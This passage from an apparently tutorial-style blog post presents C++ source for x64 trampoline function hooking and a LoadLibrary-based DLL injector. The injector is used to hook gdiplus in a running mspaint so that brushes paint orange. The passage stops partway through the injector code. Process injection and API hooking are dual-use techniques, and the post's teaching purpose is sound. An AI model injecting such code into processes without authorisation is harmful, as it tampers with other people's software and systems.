<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//size of mov/jmp instrs for absolute jump</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">absTableMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int8_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int16_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int32_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">TargetFunc</span><span class="p">(</span><span class="n">argc</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">TargetFunc</span><span class="p">,</span> <span class="n">HookPayload</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">TargetFuncTrampoline</span><span class="p">);</span>
<span class="n">TargetFunc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<h2 id="example-4-using-a-trampoline-to-hook-a-running-program">Example 4: Using a Trampoline to Hook a Running Program</h2>
<p>Like Po at the end of Kung Fu Panda, it’s time to put all our newfound skills to use and fulfill our destiny of becoming the dragon warrior.</p>
<p>The last example is going to use a trampoline to force mspaint to always use the color orange, no matter what color the user tries to select. This was shown in the gif at the start of article, but it’s been a long time since then, so here that gif is again:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/orangepaint.gif" />
<br /><br />
</div>
<p>Mercifully for us, we don’t need to go on an RVA fishing trip this time, because the function we want to hook is exported from a DLL. We’re going to install a hook into gdiplus.dll’s GdipSetSolidFillColor() function. Finding out that this was the right function to hook was pretty much the same process as the last mspaint example: lots of trial and error with breakpoints in x64dbg. A reverse engineer I am not.</p>
<p>So, here’s the plan:</p>
<ol>
<li>Write a hook payload function that intercepts calls to GdipSetSolidFillColor and replaces the incoming function arguments with the color orange.</li>
<li>Put that payload in a DLL, along with all the hooking logic required to make it happen</li>
<li>Inject that DLL into a running instance of mspaint</li>
<li>Make beautiful artwork with the best color ever.</li>
</ol>
<p>We’ve already exhaustively walked through a code example that used the same hooking logic that we need to use here. Rather than do that again, let’s focus on what’s different this time. Looking up GdipSetSolidFillColor() gives us this function signature:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">GpStatus</span> <span class="n">WINGDIPAPI</span> <span class="n">GdipSetSolidFillColor</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span> <span class="o">*</span><span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">)</span></code></pre></figure>
<p>Recall that the ARGB type is a uint32 with each byte representing a color channel. This means that all our payload need to do to make things orange is set some bits and pass the new ARGB value to the trampoline:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span><span class="p">(</span><span class="o">*</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">)(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span> <span class="nf">GdipSetSolidFillColorPayload</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">orange</span> <span class="o">=</span> <span class="mh">0xffff7700</span><span class="p">;</span>
<span class="k">return</span> <span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">(</span><span class="n">brush</span><span class="p">,</span> <span class="n">orange</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This isn’t going to be enough to make ALL the possible painting tools spit out orange all the time. The paint can tool, spray paint brushes, etc will still use the colors selected. Our dll will just make most brushes always paint orange, which is good enough for me. It’ll also totally mess with the output of some brushes and make them operate weirdly too, which is fun in its own way.</p>
<p>Here’s a gif demonstrating some of the tools <em>not</em> painting orange, despite our dll being injected into paint:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/orangepaint_problems.gif" />
<br /><br />
</div>
<p>The hooking logic that we include in the DLL is going to similar to the trampoline code we wrote for Example 3. The main difference is how we get a pointer to the function we want to hook.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">gdiPlusModule</span> <span class="o">=</span> <span class="n">FindModuleInProcess</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="p">(</span><span class="s">"gdiplus.dll"</span><span class="p">));</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">localHookFunc4</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">gdiPlusModule</span><span class="p">,</span> <span class="p">(</span><span class="s">"GdipSetSolidFillColor"</span><span class="p">));</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">localHookFunc4</span><span class="p">,</span> <span class="n">GdipSetSolidFillColorPayload</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The FindModuleInProcess() function called above is similar to the GetBaseModuleForProcess() function that we used in a previous example, except that it can look for any loaded module by string name. The function is a bit long, so rather than paste it here, I’ve included it in the complete source for this example. The program used to inject this dll into paint is the same as the one we used before, but it’s also included below.</p>
<p>It took a while to get here, but we’re finally done Example 4! Go celebrate by making beautiful orange artwork!</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Source For DLL Injector Program (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process</span>
<span class="c1">// usage: Injector_LoadLibrary <process name> <path to dll> </span>
<span class="cp">#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
</span>
<span class="kt">void</span> <span class="nf">printHelp</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injector_LoadLibrary</span><span class="se">\n</span><span class="s">Usage: Injector_LoadLibrary <process name> <path to dll></span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">createRemoteThread</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processID</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllPath</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span>
<span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span> <span class="c1">//Needed to get a process' token</span>
<span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="c1">//for obvious reasons</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="c1">//required to perform operations on address space of process (like WriteProcessMemory)</span>
<span class="n">PROCESS_VM_WRITE</span><span class="p">,</span> <span class="c1">//required for WriteProcessMemory</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="c1">//don't inherit handle</span>
<span class="n">processID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">handle</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not open process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//once the process is open, we need to write the name of our dll to that process' memory</span>
<span class="kt">size_t</span> <span class="n">dllPathLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dllPath</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">dllPathRemote</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//let the system decide where to allocate the memory</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="c1">//actually commit the virtual memory</span>
<span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="c1">//mem access for committed page</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dllPathRemote</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not allocate %zd bytes in process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">writeSucceeded</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="n">dllPathRemote</span><span class="p">,</span>
<span class="n">dllPath</span><span class="p">,</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">writeSucceeded</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not write %zd bytes to process with pid %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now get address of LoadLibraryW function inside Kernel32.dll</span>
